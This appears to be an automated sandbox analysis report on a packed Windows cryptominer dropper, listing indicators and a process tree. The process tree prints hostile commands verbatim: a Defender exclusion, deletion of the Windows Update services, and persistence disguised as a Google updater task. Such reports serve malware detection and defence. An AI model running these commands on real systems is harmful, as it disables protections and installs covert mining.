Analysis
-
max time kernel
300s -
max time network
278s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
25-09-2022 11:52
Behavioral task
behavioral1
Sample
11.exe
Resource
win7-20220812-en
General
-
Target
11.exe
-
Size
7.0MB
-
MD5
b76c48fd62b955eea124b76e3e1eddf0
-
SHA1
40ac78ddd36295c7abf81e9e1405f2e75953ab17
-
SHA256
2a52bd1672e345f12e0175bcaec0f9c520c8523d74e576c222a89b7b258f64f2
-
SHA512
9e5b59f61a2a1812923110cedd3fe85c9f0e8332450f89a625b525786d0705e8e5f90067c38f8ed73ef1eb446871dbeda8906edba8cb0e4d1893577cf6a85209
-
SSDEEP
196608:Zff6pVbPXSxEieA3Rry41AjbZLKjewctp28CWcDdod0Xi6P:VypUxRrP1KIePp2jWcy0XiE
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
updater.exe11.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 11.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/5060-227-0x00007FF774040000-0x00007FF774834000-memory.dmp xmrig behavioral2/memory/5060-228-0x00007FF774040000-0x00007FF774834000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
updater.exe11.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts updater.exe File created C:\Windows\system32\drivers\etc\hosts 11.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 2548 updater.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral2/memory/5060-227-0x00007FF774040000-0x00007FF774834000-memory.dmp upx behavioral2/memory/5060-228-0x00007FF774040000-0x00007FF774834000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
updater.exe11.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 11.exe -
Processes:
resource yara_rule behavioral2/memory/3420-132-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp themida behavioral2/memory/3420-133-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp themida behavioral2/memory/3420-134-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp themida behavioral2/memory/3420-135-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp themida behavioral2/memory/3420-136-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp themida behavioral2/memory/3420-137-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp themida behavioral2/memory/3420-138-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp themida behavioral2/memory/3420-140-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp themida behavioral2/memory/3420-168-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida behavioral2/memory/2548-173-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp themida behavioral2/memory/2548-175-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp themida behavioral2/memory/2548-176-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp themida behavioral2/memory/2548-177-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp themida behavioral2/memory/2548-178-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp themida behavioral2/memory/2548-179-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp themida behavioral2/memory/2548-180-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp themida behavioral2/memory/2548-181-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp themida behavioral2/memory/2548-223-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida -
Processes:
11.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 11.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
11.exeupdater.exepid process 3420 11.exe 2548 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 2548 set thread context of 1204 2548 updater.exe conhost.exe PID 2548 set thread context of 5060 2548 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
11.exeupdater.execmd.execmd.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe 11.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3932 sc.exe 3732 sc.exe 2036 sc.exe 224 sc.exe 1320 sc.exe 3428 sc.exe 3676 sc.exe 3656 sc.exe 3952 sc.exe 4056 sc.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepid process 3484 powershell.exe 3484 powershell.exe 3436 powershell.exe 3436 powershell.exe 4308 powershell.exe 4308 powershell.exe 1608 powershell.exe 1608 powershell.exe 4104 powershell.exe 4104 powershell.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe 5060 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 668 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 3484 powershell.exe Token: SeShutdownPrivilege 2736 powercfg.exe Token: SeCreatePagefilePrivilege 2736 powercfg.exe Token: SeDebugPrivilege 3436 powershell.exe Token: SeShutdownPrivilege 216 powercfg.exe Token: SeCreatePagefilePrivilege 216 powercfg.exe Token: SeShutdownPrivilege 524 powercfg.exe Token: SeCreatePagefilePrivilege 524 powercfg.exe Token: SeShutdownPrivilege 3848 powercfg.exe Token: SeCreatePagefilePrivilege 3848 powercfg.exe Token: SeIncreaseQuotaPrivilege 3436 powershell.exe Token: SeSecurityPrivilege 3436 powershell.exe Token: SeTakeOwnershipPrivilege 3436 powershell.exe Token: SeLoadDriverPrivilege 3436 powershell.exe Token: SeSystemProfilePrivilege 3436 powershell.exe Token: SeSystemtimePrivilege 3436 powershell.exe Token: SeProfSingleProcessPrivilege 3436 powershell.exe Token: SeIncBasePriorityPrivilege 3436 powershell.exe Token: SeCreatePagefilePrivilege 3436 powershell.exe Token: SeBackupPrivilege 3436 powershell.exe Token: SeRestorePrivilege 3436 powershell.exe Token: SeShutdownPrivilege 3436 powershell.exe Token: SeDebugPrivilege 3436 powershell.exe Token: SeSystemEnvironmentPrivilege 3436 powershell.exe Token: SeRemoteShutdownPrivilege 3436 powershell.exe Token: SeUndockPrivilege 3436 powershell.exe Token: SeManageVolumePrivilege 3436 powershell.exe Token: 33 3436 powershell.exe Token: 34 3436 powershell.exe Token: 35 3436 powershell.exe Token: 36 3436 powershell.exe Token: SeIncreaseQuotaPrivilege 3436 powershell.exe Token: SeSecurityPrivilege 3436 powershell.exe Token: SeTakeOwnershipPrivilege 3436 powershell.exe Token: SeLoadDriverPrivilege 3436 powershell.exe Token: SeSystemProfilePrivilege 3436 powershell.exe Token: SeSystemtimePrivilege 3436 powershell.exe Token: SeProfSingleProcessPrivilege 3436 powershell.exe Token: SeIncBasePriorityPrivilege 3436 powershell.exe Token: SeCreatePagefilePrivilege 3436 powershell.exe Token: SeBackupPrivilege 3436 powershell.exe Token: SeRestorePrivilege 3436 powershell.exe Token: SeShutdownPrivilege 3436 powershell.exe Token: SeDebugPrivilege 3436 powershell.exe Token: SeSystemEnvironmentPrivilege 3436 powershell.exe Token: SeRemoteShutdownPrivilege 3436 powershell.exe Token: SeUndockPrivilege 3436 powershell.exe Token: SeManageVolumePrivilege 3436 powershell.exe Token: 33 3436 powershell.exe Token: 34 3436 powershell.exe Token: 35 3436 powershell.exe Token: 36 3436 powershell.exe Token: SeIncreaseQuotaPrivilege 3436 powershell.exe Token: SeSecurityPrivilege 3436 powershell.exe Token: SeTakeOwnershipPrivilege 3436 powershell.exe Token: SeLoadDriverPrivilege 3436 powershell.exe Token: SeSystemProfilePrivilege 3436 powershell.exe Token: SeSystemtimePrivilege 3436 powershell.exe Token: SeProfSingleProcessPrivilege 3436 powershell.exe Token: SeIncBasePriorityPrivilege 3436 powershell.exe Token: SeCreatePagefilePrivilege 3436 powershell.exe Token: SeBackupPrivilege 3436 powershell.exe Token: SeRestorePrivilege 3436 powershell.exe Token: SeShutdownPrivilege 3436 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
11.execmd.execmd.exepowershell.exeupdater.execmd.execmd.exedescription pid process target process PID 3420 wrote to memory of 3484 3420 11.exe powershell.exe PID 3420 wrote to memory of 3484 3420 11.exe powershell.exe PID 3420 wrote to memory of 1996 3420 11.exe cmd.exe PID 3420 wrote to memory of 1996 3420 11.exe cmd.exe PID 3420 wrote to memory of 1640 3420 11.exe cmd.exe PID 3420 wrote to memory of 1640 3420 11.exe cmd.exe PID 3420 wrote to memory of 3436 3420 11.exe powershell.exe PID 3420 wrote to memory of 3436 3420 11.exe powershell.exe PID 1996 wrote to memory of 3656 1996 cmd.exe sc.exe PID 1996 wrote to memory of 3656 1996 cmd.exe sc.exe PID 1640 wrote to memory of 2736 1640 cmd.exe powercfg.exe PID 1640 wrote to memory of 2736 1640 cmd.exe powercfg.exe PID 1640 wrote to memory of 216 1640 cmd.exe powercfg.exe PID 1640 wrote to memory of 216 1640 cmd.exe powercfg.exe PID 1996 wrote to memory of 224 1996 cmd.exe sc.exe PID 1996 wrote to memory of 224 1996 cmd.exe sc.exe PID 1640 wrote to memory of 524 1640 cmd.exe powercfg.exe PID 1640 wrote to memory of 524 1640 cmd.exe powercfg.exe PID 1996 wrote to memory of 1320 1996 cmd.exe sc.exe PID 1996 wrote to memory of 1320 1996 cmd.exe sc.exe PID 1640 wrote to memory of 3848 1640 cmd.exe powercfg.exe PID 1640 wrote to memory of 3848 1640 cmd.exe powercfg.exe PID 1996 wrote to memory of 3428 1996 cmd.exe sc.exe PID 1996 wrote to memory of 3428 1996 cmd.exe sc.exe PID 1996 wrote to memory of 3676 1996 cmd.exe sc.exe PID 1996 wrote to memory of 3676 1996 cmd.exe sc.exe PID 1996 wrote to memory of 4572 1996 cmd.exe reg.exe PID 1996 wrote to memory of 4572 1996 cmd.exe reg.exe PID 1996 wrote to memory of 3672 1996 cmd.exe reg.exe PID 1996 wrote to memory of 3672 1996 cmd.exe reg.exe PID 1996 wrote to memory of 776 1996 cmd.exe reg.exe PID 1996 wrote to memory of 776 1996 cmd.exe reg.exe PID 1996 wrote to memory of 3044 1996 cmd.exe reg.exe PID 1996 wrote to memory of 3044 1996 cmd.exe reg.exe PID 1996 wrote to memory of 2288 1996 cmd.exe reg.exe PID 1996 wrote to memory of 2288 1996 cmd.exe reg.exe PID 3420 wrote to memory of 4308 3420 11.exe powershell.exe PID 3420 wrote to memory of 4308 3420 11.exe powershell.exe PID 4308 wrote to memory of 2832 4308 powershell.exe schtasks.exe PID 4308 wrote to memory of 2832 4308 powershell.exe schtasks.exe PID 2548 wrote to memory of 1608 2548 updater.exe powershell.exe PID 2548 wrote to memory of 1608 2548 updater.exe powershell.exe PID 2548 wrote to memory of 4556 2548 updater.exe cmd.exe PID 2548 wrote to memory of 4556 2548 updater.exe cmd.exe PID 2548 wrote to memory of 3620 2548 updater.exe cmd.exe PID 2548 wrote to memory of 3620 2548 updater.exe cmd.exe PID 2548 wrote to memory of 4104 2548 updater.exe powershell.exe PID 2548 wrote to memory of 4104 2548 updater.exe powershell.exe PID 3620 wrote to memory of 4668 3620 cmd.exe powercfg.exe PID 3620 wrote to memory of 4668 3620 cmd.exe powercfg.exe PID 4556 wrote to memory of 3952 4556 cmd.exe sc.exe PID 4556 wrote to memory of 3952 4556 cmd.exe sc.exe PID 4556 wrote to memory of 3932 4556 cmd.exe sc.exe PID 4556 wrote to memory of 3932 4556 cmd.exe sc.exe PID 3620 wrote to memory of 3216 3620 cmd.exe powercfg.exe PID 3620 wrote to memory of 3216 3620 cmd.exe powercfg.exe PID 4556 wrote to memory of 4056 4556 cmd.exe sc.exe PID 4556 wrote to memory of 4056 4556 cmd.exe sc.exe PID 3620 wrote to memory of 4756 3620 cmd.exe powercfg.exe PID 3620 wrote to memory of 4756 3620 cmd.exe powercfg.exe PID 4556 wrote to memory of 3732 4556 cmd.exe sc.exe PID 4556 wrote to memory of 3732 4556 cmd.exe sc.exe PID 3620 wrote to memory of 328 3620 cmd.exe powercfg.exe PID 3620 wrote to memory of 328 3620 cmd.exe powercfg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#kfqirnwiw#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#khtnr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
